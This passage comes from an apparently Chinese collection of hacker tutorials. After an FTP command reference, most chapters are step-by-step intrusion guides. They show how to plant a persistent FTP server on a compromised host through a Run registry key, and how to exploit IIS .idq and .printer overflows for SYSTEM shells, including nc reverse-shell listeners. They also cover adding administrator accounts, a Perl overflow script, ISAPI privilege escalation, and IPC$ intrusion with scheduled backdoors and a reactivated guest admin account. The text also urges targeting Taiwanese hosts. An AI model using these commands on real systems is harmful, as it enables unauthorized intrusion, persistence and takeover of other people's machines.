  -v显示远程服务器的所有响应信息。
  -d使用调试方式。
  -n限制ftp的自动登录,即不使用.netrc文件。
  -g取消全局文件名。
  ftp使用的内部命令如下(其中括号表示可选项):
  1.![cmd[args]]在本地机中执行交互shell、exit回到ftp环境,如!ls*.zip。
  2.¥macro-ame[args]执行宏定义macro-name。
  3.account[password]提供登录远程系统成功后访问系统资源所需的补充口令。
  4.appendlocal-file[remote-file]将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
  5.ascii使用ascii类型传输方式。
  6.bell每个命令执行完毕后计算机响铃一次。
  7.bin使用二进制文件传输方式。
  8.bye退出ftp会话过程。
  9.case在使用mget时,将远程主机文件名中的大写转为小写字母。
  10.cdremote-dir进入远程主机目录。
  11.cdup进入远程主机目录的父目录。
  12.chmodmodefile-name将远程主机文件file-name的存取方式设置为mode,如chmod777a.out。
  13.close中断与远程服务器的ftp会话(与open对应)。
  14.cr使用asscii方式传输文件时,将回车换行转换为回行。
  15.deleteremote-file删除远程主机文件。
  16.debug[debug-value]设置调试方式,显示发送至远程主机的每条命令,如debup3,若设为0,表示取消debug。
  17.dir[remote-dir][local-file]显示远程主机目录,并将结果存入local-file。
  18.disconnection同close。
  19.formformat将文件传输方式设置为format,缺省为file方式。
  20.getremote-file[local-file]将远程主机的文件remote-file传至本地硬盘的local-file。
  21.glob设置mdelete、mget、mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
  22.hash每传输1024字节,显示一个hash符号(#)。
  23.help[cmd]显示ftp内部命令cmd的帮助信息,如helpget。
  24.idle[seconds]将远程服务器的休眠计时器设为[seconds]秒。
  25.image设置二进制传输方式(同binary)
  26.lcd[dir]将本地工作目录切换至dir。
  27.ls[remote-dir][local-file]显示远程目录remote-dir,并存入本地local-file。
  28.macdefmacro-name定义一个宏,遇到macdef下的空行时,宏定义结束。
  29.mdelete[remote-file]删除远程主机文件。
  30.mdirremote-fileslocal-file与dir类似,但可指定多个远程文件,如mdir*.o.*.zipoutfile。
  31.mgetremote-files传输多个远程文件。
  32.mkdirdir-name在远程主机中建一目录。
  33.mlsremote-filelocal-file同nlist,但可指定多个文件名。
  34.mode[mode-name]将文件传输方式设置为mode-name,缺省为stream方式。
  35.modtimefile-name显示远程主机文件的最后修改时间。
  36.mputlocal-file将多个文件传输至远程主机。
  37.newerfile-name如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
  38.nlist[remote-dir][local-file]显示远程主机目录的文件清单,并存入本地硬盘的local-file。
  39.nmap[inpatternoutpattern]设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如nmap¥1.¥2.¥3[¥1,¥2].[¥2,¥3],则传输文件a1.a2.a3时,文件名变为a1、a2,该命令特别适用于远程主机为非U-NIX机的情况。
  40.ntrans[inchars[outchars]]设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。
  41.openhost[port]建立指定ftp服务器连接,可指定连接端口。
  42.passive进入被动传输方式。
  43.prompt设置多个文件传输时的交互提示。
  44.proxyftp-cmd在次要控制连接中,执行一条ftp命令,该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。
  45.putlocal-file[remote-file]将本地文件local-file传送至远程主机。
  46.pwd显示远程主机的当前工作目录。
  47.quit同bye,退出ftp会话。
  48.quotearg1,arg2……将参数逐字发至远程ftp服务器,如quotesyst。
  49.recvremote-file[local-file]同get。
  50.regetremote-file[local-file]类似于get,但若local-file存在,则从上次传输中断处续传。
  51.rhelp[cmd-name]请求获得远程主机的帮助。
  52.rstatus[file-name]若未指定文件名,则显示远程主机的状态,否则显示文件状态。
  53.rename[from][to]更改远程主机文件名。
  54.reset清除回答队列。
  55.restartmarker从指定的标志marker处,重新开始get或put,如restart130。
  56.rmdirdir-name删除远程主机目录。
  57.runique设置文件名唯一性存储,若文件存在,则在原文件后加后缀。
  58.sendlocal-file[remote-file]同put。
  59.sendport设置PORT命令的使用。
  60.sitearg1,arg2……将参数作为SITE命令逐字发送至远程ftp主机。
  61.sizefile-name显示远程主机文件大小,如siteidle7200。
  62.status显示当前ftp状态。
  63.struct[struct-name]将文件传输结构设置为struct-name,缺省时使用stream结构。
  64.sunique将远程主机文件名存储设置为唯一(与runique对应)。
  65.system显示远程主机的操作系统类型。
  66.tenex将文件传输类型设置为TENEX机所需的类型。
  67.tick设置传输时的字节计数器。
  68.trace设置包跟踪。
  69.type[type-name]设置文件传输类型为type-name,缺省为ascii,如typebinary,设置二进制传输方式。
  70.umask[newmask]将远程服务器的缺省umask设置为newmask,如umask3。
  71.useruser-name[password][account]向远程主机表明自己的身份,需要口令时,必须输入口令,如useranonymousmy@email。
  72.verbose同命令行的-v参数,即设置详尽报告方式,ftp服务器的所有响应都将显示给用户,缺省为on.
  73.?[cmd]同help。
  那么如何应用这些命令提高效率呢?下面我举一个例子,如何利用fttp进行后台下载,假设你的ISP给你提供了shell并且可以用nohup,你想由fttp.download.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下:
  1.用notepad做一个文件如aaa1内容如下
  openftp.dwonload.com
  useranonymouszyz@cenpok.net
  cd/pub/internet/
  i
  getaaa.zip
  close
  bye
  2.拨号登录到你的ISP上。用telnet或netterm登录到shell,一般都在你的home子目录里bbs~/
  3.用fttp上传aaa1到ISP服务器你的子目录。
  4.执行nohupfttp-invdaaa2&
  这样这个进程就被放在ISP服务器的后台进行了,如果你想知道情况如何,可以moreaaa2就可以知道情况如何了。这时你可以断线了或干点别的,估计时间到了(time约=30M/(33.6K/9)s)拨号上去,moreaaa2如果显示成功下载aaa.zip就表示aaa.zip已经被下载到ISP的服务器上了,你再由ISP的服务器拉回来就相当与点对点了,记得下载完成后del掉你的文件(aaa.zip),免得浪费ISP资源,它会关掉shell的。
U憂書擝 UUTxt.COm 全汶吇版月渎


第一卷 第一十章 字数:1966
  ?我们在入侵别人机器时候,经常需要一个ftp服务器。去申请的主页空间附带的ftp服务器常常有各种限制,而且,不小心就会暴露了自己的身份。因此,建立一个自己专用的ftp服务器,是很有用的。经过我一阵疯狂搜索,终于找到了slimftp这个好东东,首先,它身材小巧,而且不需要安装,在console下就可以运行,绝对不会弹出窗口,提供了标准的上传、下载功能,而且可以更改服务端口、设置用户权限等。关于slimftp的功能,请参考它的说明文档。
  在这里,我假定大家已经获得了一个管理员或者系统权限的shell,这是安装它必需的权限。
  安装步骤:安装步骤分为本地设置和服务器设置。
  本地设置:将本文附带的文件全部放在一个文件夹里面,这里是d:\ftp,然后运行adminftp.exe。运行窗口分成三部分,最上面是服务器的参数的设置,左下方是用户帐号的设置,右下方是访问目录的设置。
  对于服务器参数的设置,只需要对serverport(服务器端口)进行一下设置就可以了,因为服务器上通常还运行有ftp服务器,所以,我们改一个不一样的端口,这里我是设置了3323,另外两个参数就不用管了。然后,我们再添加一个用户,点一下new,输入一个用户名root,再选中这个用户,输入一个密码nopass。最后,在localroot上输入一个路径c:\,这是作为root用户的根目录的,点一下new,在弹出的窗口上输入/就可以了,再将下面的四个权限全部钩上吧。read权限允许用户下载文件,write权限允许用户上传文件,list权限允许用户看目录列表,admin权限允许用户重命令和删除ftp服务器上的文件。如果需要,还可以创建多个用户,这就要看你了。
  进入命令行,切换目录到d:\ftp,输入
  regexport"HKLM\SOFTWARE\WhitSoftDevelopment"ftp.reg
  现在本地操作已经全部完成了。
  远程操作:将ftp.reg、slimftp2.exe、reg.exe都上传到肉鸡上,然后将slimftp2.exe拷贝到肉鸡的系统目录(通常为c:\winnt\****32,假如不存在)上。再运行
  regimportftp.reg
  regaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/vWinsock2up/dslimftp2.exe
  copyslimftp2.exe%****root%\****32
  slimftp2.exe
  运行copyslimftp2.exe%****root%\****32这步的时候有时会提示出错,这是因为slimftp2.exe已经是在系统目录上了。最后,删除ftp.reg吧!。
  呵呵,一切都完成了,即使肉鸡重启我们的ftp服务器也会照样运行的。
  不过,这个服务器的端口有点特别,我们怎么访问呢?
  假如是用ie,这样输入就好了ftp://root:nopass@192.168.0.1:3323/将192.168.0.1替换成你服务器的ip就可以了。dos下的ftp呢?这样!
  ftp
  open192.168.0.13323
  root
  nopass
  注意事项:你可以将slimftp2.exe的文件名、服务端口更改,但是,相应的步骤输入也应该更改。
  比如,我将slimftp2.exe改名叫wsockup.exe,那么,
  regaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/vWinsock2up/dslimftp2.exe
  就应该变为
  regaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/vWinsock2up/dwsockup.exe
优優書萌 UUTxt.com 诠蚊吇板月镀


第一卷 第一十一章 字数:3533
  ?近日在奇兵兄的网站看到了一篇特别适合我们这种菜鸟的文章,特地借来让大家看看。
  好了,不在说了!我们开始吧!大家一定听说过.ida&.idq漏洞了吧!一个很简单,有实用的东东!菜鸟最适合了,什么,你等不及了啊,好好好,我这就说!
  去这里看看吧~http://www.cnqb.net/soft/idq.zip
  http://www.cnqb.net/down/
  有两个程序,IISMiscOverflowV1_Build0010.exe和IISIDQOverflowV1_Build0010.exe
  下载运行前者出现了程序的主界面.
  看看我的实战吧~~~
  首先找到有.idq漏洞的机器,流光可以扫描到.很多的.随便来一个.最好扫台湾的哦!什么地址!!!!!你没地址吗,好好好,算我考虑周到,给个给你,要是没扫到的话自己想办法,告诉你到新浪搜索一下台湾的不就有很多了吗!
  在被攻击IP地址后面写上对方的IP.端口号一般不需要改动.
  左面选择操作系统类型.先选择IIS5EnglishWin2kSp0吧~
  软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~
  点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了.
  都说nc比telnet强大.用nc吧~
  ##########注意:DOS状态###########
  E:\>nc-vvXXX.XXX.XXX.XXX813
  XXX.XXX.XXX.XXX:inversehostlookupfailed:h_errno11004:NO_DATA
  (UNKNOWN)[XXX.XXX.XXX.XXX]813(?):connectionrefused
  sent0,rcvd0:NOTSOCK
  E:\>
  看来没成功.别灰心,在来一次嘛!
  换用IIS5EnglishWin2kSp1再试!
  E:\>nc-vvXXX.XXX.XXX.XXX813
  XXX.XXX.XXX.XXX:inversehostlookupfailed:h_errno11004:NO_DATA
  (UNKNOWN)[XXX.XXX.XXX.XXX]813(?)open
  MicrosoftWindows2000[Version5.00.2195]
  (C)Copyright1985-2000MicrosoftCorp.
  C:\WINNT\system32>
  OK!!!终于上来了...往下不用我再教你了吧~~~~你不用在向用unicode那样害怕权限不够了.你现在可是system权限.好了慢慢玩吧~
  这个软件非常不错.但是还提供了对中文IIS的攻击.请大家慎用~~~小心了!!!!!!
  其实这篇文章想介绍命令行版本.但是我运行命令行版本时总是出现错误.运行不成功.自己去试一下吧~~~
  最后再嘱咐一声~~~不要对国内主机做什么!!!危险!!!!!爱国哦!记住没有啊!
  中午饭都还没有吃呢!
  ########################################################################################
  接下来就是IISIDQOverflowV1_Build0010.exe了!为了方便,可以把他改名比如idq.exe
  在DOS状态下(假设idq.exe在c:\下)
  c:\idq.exe
  运行参数:操作系统类型目的地址web端口溢出端口
  支持的操作系统类型:----
  0--IIS5中文Win2kSp0
  1--IIS5中文Win2kSp1
  2--IIS5中文Win2kSp2
  3--IIS5EnglishWin2kSp0
  4--IIS5EnglishWin2kSp1
  5----notsupport--IIS5EnglishWin2kSp2
  6--IIS5JapaneseWin2kSp0
  7--IIS5JapaneseWin2kSp1
  8----notsupport--IIS5JapaneseWin2kSp2
  IIS5IDQOverflow.bysnake.(http://snake12.top263.net)2000/07
  c:\>idq3XXX.XXX.XXX.XXX80456
  连接目的机器XXX.XXX.XXX.XXX:80OK.
  发送shellcode到XXX.XXX.XXX.XXX:80OK
  现在,你可以连接该主机的端口456了,goodluck.!
  都祝我好运了.开始吧~~~
  c:\>nc-vvXXX.XXX.XXX.XXX456
  mail.rycf.org[XXX.XXX.XXX.XXX]456(?):connectionrefused
  sent0,rcvd0:NOTSOCK
  没成功.试试sp1.
  c:\>idq4XXX.XXX.XXX.XXX80888
  连接目的机器XXX.XXX.XXX.XXX:80OK.
  发送shellcode到XXX.XXX.XXX.XXX:80OK
  现在,你可以连接该主机的端口888了,goodluck.!
  c:\>nc-vvXXX.XXX.XXX.XXX888
  XXX.XXX.XXX.XXX:inversehostlookupfailed:h_errno11004:NO_DATA
  (UNKNOWN)[XXX.XXX.XXX.XXX]888(?)open
  MicrosoftWindows2000[Version5.00.2195]
  (C)Copyright1985-2000MicrosoftCorp.
  C:\WINNT\system32>
  呵呵!OK!现在你想干什么啊!把他的主页换成自己的怎么样啊!怎么不懂啊!
  那我也没办法了,不懂就来请教我怎么样啊!http;//www.cnqb.net
  本篇文章有什么不足之处望指出!本人先谢了!
憂优書擝 uUTXt.cOM 荃蚊字扳阅渎


第一卷 第一十二章 字数:7814
  ?国产.printer远程溢出攻击软件使用实例
  1、小榕的IIS5Exploit
  严格地说,这软件并不是小榕写的,这软件是小榕根据jill.c改编优化部分代
  码编译出来的。不过这软件确实很好,特别推荐大家使用。
  下载地址http://www.netxeyes.com/IIS5Exploit.zip
  压缩包里含有三个文件IIS5Exploit.exe、nc.exe、readme.txt
  IIS5.PrinterExploit使用说明
  -----------------以下是readme.txt的内容
  本程序适用于英文版IIS5.0
  1、首先在本机用NC开一个监听端口。
  C:\>nc-l-p99
  2、运行IIS5Exploit
  D:\>jillxxx.xxx.xxx.xxx211.152.188.1333
  ===========IIS5EnglishVersion.PrinterExploit.===========
  ===WrittenbyAssassin1995-2001.http://www.netXeyes.com===
  Connecting211.152.188.1...OK.
  SendShellCode...OK
  IIS5ShellCodeSendOK
  其中211.152.188.1指向本地IP。
  稍等片刻,如果成功在本机NC监听的端口出现:
  C:\>nc-l-p99
  MicrosoftWindows2000[Version5.00.2195]
  (C)Copyright1985-1999MicrosoftCorp.
  C:\>
  可以执行命令。如:
  C:\>netuserhackpassword/add
  Thecommandcompletedsuccessfully.
  C:\>netlocalgroupadministrartorshack/add
  这样就创建了一个属于Administrator组的用户Hack,密码为password.
  -----------------------------------------------------------------
  使用说明解释:
  使用这软件实际上要开两个MS-DOS窗口,首先运行nc-l-p99当然也可以
  把端口定义为其他的,建议把开的端口改高些,避免在测试的同时恰好别人
  在扫描你的端口,影响你正常的测试,小榕在写这说明时也许很急,写运行
  运行IIS5Exploit也没写好,正确的是
  IIS5Exploit目标主机的IP攻击者IP99(要与自己NC开的端口一致)
  为了攻击的成功率高,首先必须要明确所攻击的目标主机一定是开有
  http\https服务的win2k。我们可以通过telnet目标主机的80端口getindex.htm
  来判断对方win2k的版本是不是MicrosoftWindows2000[Version5.00.2195]
  也可以用eyas提供的ScanPrinter来扫描获得。
  2、sunx.org提供的iis5hack
  下载地址http://www.sunx.org/mysoft/iis5hack.zip
  运行参数
  iis5hack
  中文WIN2K:0
  中文WIN2Ksp1:1
  英文WIN2K:2
  英文WIN2K,sp1:3
  日文WIN2K:4
  日文WIN2K,sp1:5
  E:\HACK\print>iis5hack63.110.130.66803
  iis5remote.printeroverflow.writenbysunx
  http://www.sunx.org
  fortestonly,dontusedtohack,
  connecting...
  sending...
  Nowyoucantelnetto99port
  goodluck
  c:\telnet63.110.130.6699
  MicrosoftWindows2000[Version5.00.2195]
  (C)Copyright1985-2000MicrosoftCorp.
  C:\WINNT\system32>
  已经进入目标主机,你想干什么就是你的事啦。该软件的优点是针对多种语
  言版本的WIN2K系统,缺点,溢出成功后目标主机的IIS停止服务,并且得到
  SHELL后要在较短时间内完成你想做的事,时间长的话连SHELL、IIS都会死
  掉;不能随意定义目标主机的SHELL端口。
  在退出TELNET服务时也一定要记住正常exit退出,否则目标主机的IIS也会死。
  呵呵,我在测试过程中发现只是两三分钟时间对方的IIS就死了,看来把这软
  件当做拒绝服务攻击型的软件也不错哦。
  3、isno.yeah.net提供的cniis、iisx
  isno最新的.printer漏洞攻击软件是iisx,是CNIIS的升级版本,按找作者的
  使用说明我们可以看到:
  使用方法:iisx
  sp:0---目标没有安装SP,1---目标安装了SP1
  提供三种对IIS5.printer漏洞的攻击方式:
  -p---对攻击目标运行iisx66.77.88.990-p
  在66.77.88.99上开一个端口7788,可以直接telnet66.77.88.997788
  -a---对攻击目标运行iisx66.77.88.990-a
  在66.77.88.99上添加一个管理员帐号:hax,其密码也为hax,
  可以使用netuse\\66.77.88.99\ipc$"hax"/user:"hax"建立连接。
  -r---反向连接(类似于jill的方式),具体实施方法如下:
  例如先在一台机器111.222.333.444上运行nc-vv-l-p5432,
  然后对攻击目标运行iisx66.77.88.990-r111.222.33.4445432,
  这时在111.222.333.444就会出现来自66.77.88.99的连接。
  ---------------------------------
  对于该软件,我没有做他多的测试,不过我们可以看到,其第一种方法和SUNX的
  IIS5HACK是一样的,只不过定制溢出的TELNET端口不同,对于固定溢出端口,我
  总觉得不是那么好,至少在你测试的时候别人也在扫描相同的主机时,你的行为
  就很容易被人发现。
  对于第二种方法,只能攻击那些安全技术非常贫乏的网络管理员了,因为添加这
  样一个密码和用户ID都一样的超级用户都能成功的话,对方也就很该死了,因为
  那管理员连密码长字节和特殊字符化都不设定,那水平就可想而知了。
  对于第三种攻击方法和jill.c差不多,所以也不再做详细介绍。
  四、一些扫描.printer漏洞的程序测试
  1、eyas编写的扫描程序cgicheck
  eyas我一个很好的朋友,一个很有进取精神的小伙子,现在在国内某安全公司
  工作,在微软的.printer漏洞公告出来后就写了一个专门扫描该漏洞的工具
  scanprinter,由于时间仓促,那软件尽管可以扫描该漏洞,但在定制扫描线程
  和超时延迟方面没有写好,使用起来不是那么如意。
  本来想介绍他的scanprinter,恰好在我写到这部分内容时,他给我E来他的新
  作品cgicheck,这也是个测试版的DOS命令工具,从文件名我们可以看到,他打
  算把这软件写成类似twwwscan那样的cgi漏洞扫描工具。
  现在让我们看看使用效果。
  以下是运行在AMD850128MB64KISDNWIN98SE下的扫描情况。
  E:\>CGICHECK203.212.4.1203.212.4.2551004
  [203.212.4.18]has.printermapped.
  [203.212.4.19]has.printermapped.
  [203.212.4.227]has.printermapped.
  ********100%Wait4secondstoexit********
  [203.212.4.237]has.printermapped.
  [203.212.4.238]has.printermapped.
  Alldone.
  Complete.Scan254targetsuse15.8seconds.Speed16.1/s
  从扫描结果来看这软件确实有很大的提高,建议EYAS在以后软件的升级中让软
  件可以自定义所需要扫描的内容,毕竟在针对某网段的扫描,我们不需要把所
  有的CGI漏洞都扫描(要知道有些漏洞已经很少看见了,加进去只耽误扫描的效
  率)。
  2、pl扫描程序
  我们看以下的一个用perl编写的扫描程序
  #!/usr/bin/perl
  #ExploitBystorm@stormdev.net
  #TestedwithsucessagainstWin2kIIS5.0+SP1
  #RemoteBufferOverflowTestforInternetPrintingProtocol
  #ThiscodewaswrittenaftereEyebroughtthisissueinBugTraq.
  useSocket;
  print"--IPP-IIS5.0VulnerabilityTestByStorm--\n\n";
  if(not$ARGV[0]){
  printqq~
  Usage:webexplt.pl
  ~;
  exit;}
  $ip=$ARGV[0];
  print"SendingExploitCodetohost:".$ip."\n\n";
  my@results=sendexplt("GET/NULL.printerHTTP/1.0\n"."Host:
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
  print"Results:\n";
  if(not@results){
  print"TheMachinetestedhastheIPPVulnerability!";
  }
  print@results;
  subsendexplt{
  my($pstr)=@_;
  $target=inet_aton($ip)||die("inet_atonproblems");
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0)||
  die("Socketproblems\n");
  if(connect(S,pack"SnA4x8",2,80,$target)){
  select(S);
  $|=1;
  print$pstr;
  my@in=;
  select(STDOUT);
  close(S);
  return@in;
  }else{die("Can'tconnect...\n");}
  }
  ---------------------------------------------------------------
  实际上这扫描程序是一个比较简单的pl扫描,命令格式webexplt.plip
  只能针对某一IP地址进行检测,通过发送GET/NULL.printerHTTP/1.0\n
  请求,然后传送一超长字符串给目标主机,去检测是否存在.printer漏洞。
  3、其他的一些扫描软件例如www.netguard.com.cn、www.xfocus.org
  发布的easyscan、x-scaner都专门做了针对printer漏洞的扫描,大家可以
  试试。
  5、漏洞的消除
  最好的办法是安全微软针对这漏洞发的补丁:
  补丁下载地址:
  http://www.microsoft.com/Downloads/...ReleaseID=29321
  在你无法获得补丁的情况下,我们也可以通过手动的方式设置你的服务器:
  设置》控制面板》管理工具》INTERNET服务管理器》右键单击你的站点
  如我的是badboy-f5gzewyd》属性》编辑WWW服务》主目录》配置》
  应用程序配置》找到.printer》清除
  但这样的操作你就丧失网络打印的功能。
  呵呵,总比被人利用这漏洞入侵要好呀。
uu书擝 UuTxT。com 诠蚊子版粤牍


第一卷 第一十三章 字数:4258
  ?除了公布3个拒绝服务漏洞外还公布了两个比较严重的漏洞。一个是IIS的SSINC.DLL溢出漏洞,另一个是IIS提升权限漏洞。其实我们的计划是SSINC.DLL的溢出公布后下一个就是这个权限提升漏洞。不过由于微软补丁的速度问题,没想到被别人先通告微软了。
  下面是原来内部的一些资料:
  IIS4默认情况下,应用程序保护选项是“低(共用IIS进程)”,所以加载isapi的时候是以加载IIS的身份执行。但WIN2K+IIS5.0默认情况下应用程序保护选项是“中(共用的)”,这时IIS加载isapi是用的iwam_computername用户身份执行。
  但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5、win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名,并且没有做目录限制,以SYSTEM权限加载的isapi有:
  1、idq.dll
  2、httpext.dll
  3、httpodbc.dll
  4、ssinc.dll
  5、msw3prt.dll
  6、author.dll
  7、admin.dll
  8、shtml.dll
  9、sspifilt.dll
  10、compfilt.dll
  11、pwsdata.dll
  12、md5filt.dll
  13、fpexedll.dll
  所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题,就是"/"、"\"只识别了一个"/",所以如果请求里面使用"\",就会错误的处理包含文件路径,有可能泄露东西或者出现权限漏洞,这种漏洞很多别的地方(php、asp等)也还存在。
  但在补了http://www.microsoft.com/technet/security/bulletin/ms01-026.asp补丁(%25二次解码补丁包,包含在sp3)后,加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。
  一般默认情况下是:
  1、idq.dlld:\winnt\system32\idq.dll
  2、httpext.dlld:\winnt\system32\inetsrv\httpext.dll
  3、httpodbc.dlld:\winnt\system32\inetsrv\httpodbc.dll
  4、ssinc.dlld:\winnt\system32\inrtsrv\ssinc.dll
  5、msw3prt.dlld:\winnt\system32\msw3prt.dll
  6、author.dllD:\ProgramFiles\CommonFiles\MicrosoftShared\webserverextensions\40\isapi\_vti_aut\author.dll
  7、admin.dllD:\ProgramFiles\CommonFiles\MicrosoftShared\webserverextensions\40\isapi\_vti_adm\admin.dll
  8、shtml.dllD:\ProgramFiles\CommonFiles\MicrosoftShared\webserverextensions\40\isapi\shtml.dll
  9、sspifilt.dlld:\winnt\system32\inetsrv\sspifilt.dll
  10、compfilt.dlld:\winnt\system32\inetsrv\compfilt.dll
  11、pwsdata.dlld:\winnt\system32\inetsrv\pwsdata.dll
  12、md5filt.dlld:\winnt\system32\inetsrv\md5filt.dll
  13、fpexedll.dllD:\ProgramFiles\CommonFiles\MicrosoftShared\webserverextensions\40\bin\fpexedll.dll
  正常情况下这些路径都guest不能写,所以应该算已经补上。但如果配置不好,这些路径guest能够写了就
  一样可以提升权限了
  win2000的getadmin
  把此dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。然后使用telnet或者原来的asp.exe。
  1、使用telnet。因为这不是专门的客户端,使用参数“?okok”让通信不加密,如果不带这参数将是乱码。
  D:\WINNT\temp>telnet192.168.8.4880
  get/scripts/ssinc.dll?okok
  XORDATAMicrosoftWindows2000[Version5.00.2195]
  (C)版权所有1985-2000MicrosoftCorp.
  D:\WINNT\system32>whoami
  whoami
  NTAUTHORITY\SYSTEM
  D:\WINNT\system32>
  2、使用asp.exe。同样支持iisput、iisget、iiscmd等命令。
  E:\work\asp\Debug>asp192.168.8.48/scripts/ssinc.dll
  IIS4.0OVERFLOWPROGRAM2.0.
  copybyyuange2000.6.2.
  welcometomyhomepagehttp://yuange.yeah.net.
  welcometohttp://www.nsfocus.com.
  usage:asp[aspfile][webport][offset]
  nukeip:192.168.8.48port80
  offset:0
  shellcodelong0x143c
  packetlong:0x1003c
  sendpacket65634bytes.
  recv:
  TRACK/HTTP/1.1
  HOST:192.168.8.48
  ok!recv8bytes
  recv:XORDATAMicrosoftWindows2000[Version5.00.2195]
  (C)版权所有1985-2000MicrosoftCorp.
  D:\WINNT\system32>whoami
  whoami
  NTAUTHORITY\SYSTEM
  对于IIS4默认情况下加载ISAPI的DLL都是SYSTEM权限,要得到SYSTEM权限那就根本不是问题。但IIS5默认不是,就需要利用这个提升权限漏洞。这个漏洞照现在公布的,需要有个可写目录供上传利用的dll,因为UNICODE漏洞所以不一定要在虚拟目录,不过默认情况下虚拟可执行目录/scripts可写。
  其实结合别的漏洞,根本不需要可写目录,不需要上传DLL,可以利用IIS自身带的一些DLL,利用UNICODE、利用溢出,利用再一个漏洞、加上这个提升权限的漏洞,那就可以一步到位,直接得到system权限。
  WINDOWS、IIS等漏洞太多,现在利用IIS漏洞都是玩组合了。像上面说的实际应用中就可以一下利用我们发现的unicode、fpse扩展溢出、截断、提升权限漏洞4个大漏洞。
U滺书擝 UuTXt。coM 铨纹字版月牍


第一卷 第一十四章 字数:3137
  ?大家好,由于时间的关系。我对此漏洞不作详细讲述。而且要扫描IPC$主机,需要大量的时间。所以我不推荐你用此方法攻击!
  需要系统:Windows2000(Windows98不可以进行入侵!)
  需要软件:流光(请大家到小榕的网站里下载:http://www.netxeyes.com)
  以下为一次入侵过程:(很久以前写的一篇文章!入侵的主机为台湾版Windows2000所以在攻击的过程中,会出现乱码!)
  *注意:“*”后的文字均为注释。
  MicrosoftWindows2000[Version5.00.2195]
  (C)版权所有1985-1998MicrosoftCorp.
  D:\>netuse\\211.21.253.166\IPC$""/user:"davis"
  命令成功完成。
  *这是我用流光扫到的密码~~~我们就拿它开刀吧~!
  D:\>copysrv.exe\\211.21.253.166\admin$
  已复制1个文件。
  *先复制srv.exe上去,在流光的Tools目录就有。
  D:\>nettime\\211.21.253.166。
  \\211.21.253.166的当前时间是2001/1/17上午10:48
  命令成功完成。
  *查查时间
  D:\>at\\211.21.253.16610:50srv.exe
  新加了一项作业,其作业ID=1
  *用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)然后去论坛灌几篇帖子。
  D:\>nettime\\211.21.253.166
  \\211.21.253.166的当前时间是2001/1/17上午10:51
  命令成功完成。
  *再查查够时间没有?!噢~~够了~
  D:\>telnet211.21.253.16699
  *我们telnet吧,注意端口是99哦~
  MicrosoftWindows2000[セ5.00.2195]
  (C)Copyright1985-1999MicrosoftCorp.
  C:\WINNT\system32>
  *噢~~成功了!
  D:\>copyntlm.exe\\211.21.253.166\admin$
  已复制1个文件。
  *我们再开一个DOS窗口,把ntlm.exe上传到主机上。(也是在流光流光的Tools目录)
  MicrosoftWindows2000[セ5.00.2195]
  (C)Copyright1985-1999MicrosoftCorp.
  C:\WINNT\system32>ntlm
  ntlm
  Windows2000TelnetDump,byAssassin,AllRightsReserved.
  Done!
  *我们输入ntlm启动吧。
  C:\WINNT\system32>
  C:\WINNT\system32>netstarttelnet
  netstarttelnet
  Telnet狝叭タ币笆.
  Telnet狝叭竒币笆Θ
  *然后直接用netstarttelnet启动telnet。
  C:\WINNT\system32>
  C:\WINNT\system32>
  *这个窗口已经没用了,关了它吧!
  D:\>telnet211.21.253.16699
  *我们在开一个DOS窗口,然后telnet上去。
  NTLMAuthenticationfailedduetoinsufficientcredentials.Pleaseloginwith
  cleartextusernameandpassword
  Microsoft(R)Windows(TM)Version5.00(Build2195)
  WelcometoMicrosoftTelnetService
  TelnetServerBuild5.00.99201.1
  login:davis//输入用户名
  password:
  *输入密码(密码是空的,所以不用输入)
  *===============================================================
  舧ㄏノMicrosoftTelnetServer
  *===============================================================
  C:\>copyc:\winnt\system32\srv.exec:\inetpub\scripts
  ╰参тぃ﹚郎
  *留个后门吧。
  C:\>copyc:\winnt\system32\cmd.exec:\inetpub\scripts\xiao.exe
  狡籹1郎
  *再留多个后门。
  C:\>netuserguest/active:yes
  磅︽Θ
  *将Guest用户激活.
  C:\>netuserguesthacker
  磅︽Θ
  *将Guest的密码改为hacker,或者你要设定的密码。
  C:\>netlocalgroupadministratorsguest/add
  磅︽Θ
  *将Guest变为Administrator。^_^
  如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机.
  后门够多了吧~~~~呵呵~~一个跳板就做好了!
  C:\>
  OK!
优优書萌 UuTxt.com 全蚊自扳越镀


第一卷 第一十五章 字数:1538
